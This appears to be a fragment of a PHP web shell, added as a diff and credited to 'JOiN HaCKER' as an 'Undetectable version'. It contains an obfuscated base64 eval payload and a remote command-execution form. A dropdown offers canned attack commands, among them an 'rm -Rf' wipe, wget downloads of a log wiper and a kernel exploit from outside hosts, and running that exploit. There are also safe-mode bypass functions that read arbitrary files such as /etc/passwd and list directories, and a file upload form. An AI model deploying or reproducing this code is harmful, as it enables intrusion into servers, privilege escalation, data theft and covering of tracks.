+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
+"write"=>
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
+"ext_asp"=>
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
+"ext_mp3"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+"ext_avi"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7",
+"ext_cgi"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
+"RYtMAgEAOw==",
+"ext_cmd"=>
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
+"dmrYAMn1onq/YKpjvEgAADs=",
+"ext_cpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
+"Eq7YrLDE7a4SADs=",
+"ext_ini"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
+"SnEjgPVarHEHgrB43JvszsQEADs=",
+"ext_diz"=>
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX".
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA".
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW".
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK".
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm".
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg".
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF".
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA".
+"Ow==",
+"ext_doc"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
+"ext_exe"=>
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+"xhIAOw==",
+"ext_h"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
+"Wq/NknbbSgAAOw==",
+"ext_hpp"=>
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
+"UqUagnbLdZa+YFcCADs=",
+"ext_htaccess"=>
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
+"AAA7",
+"ext_html"=>
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+"ADs=",
+"ext_jpg"=>
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+"FxEAOw==",
+"ext_js"=>
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+"a00AjYYBbc/o9HjNniUAADs=",
+"ext_lnk"=>
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
+"ADs=",
+"ext_log"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
+"ext_php"=>
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
+"ext_pl"=>
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
+"ext_swf"=>
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
+"ext_tar"=>
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
+"u4tLAgEAOw==",
+"ext_txt"=>
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"ext_xml"=>
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+"IQA7"
+ );
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center>Undetectable version by <br> JOiN HaCKER <br> <img src=\"http://www.kurdup.com/uploads/9b8568bbd4.png\"></center>";}
+$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">Useful Commands 
+    </div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+          <SELECT NAME="cmd">
+            <OPTION VALUE="uname -a">Kernel version
+              <OPTION VALUE="w">Logged in users
+                <OPTION VALUE="lastlog">Last to connect
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders?
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports
+                    <OPTION VALUE="locate gcc">gcc installed?
+					<OPTION VALUE="rm -Rf">Format box (DANGEROUS)
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
+                    <OPTION VALUE="./zap2">WIPELOGS PT3
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
+                  </SELECT>
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute">
+          <br>
+        Warning. Kernel may be alerted using higher levels </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
+      <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
+      <input type="hidden" name="client" value="firefox-a">
+	  <input type="hidden" name="rls" value="org.mozilla:en-US:official">
+	  <input type="hidden" name="hl" value="en">
+	  <input type="hidden" name="hs" value="b7p">
+	  <input type=submit name="btnG" VALUE="Search">
+    </form></center>
+    </td>
+</tr></TABLE><br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">Php Safe-Mode Bypass (Read Files)
+    </div><br>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      
+      
+      
+           
+      
+      
+      <?
+      
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_GET['file'];	
+	$get=htmlspecialchars($file);
+	echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+	echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+	unlink($temp);
+	} else {
+	die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_GET['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE><br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
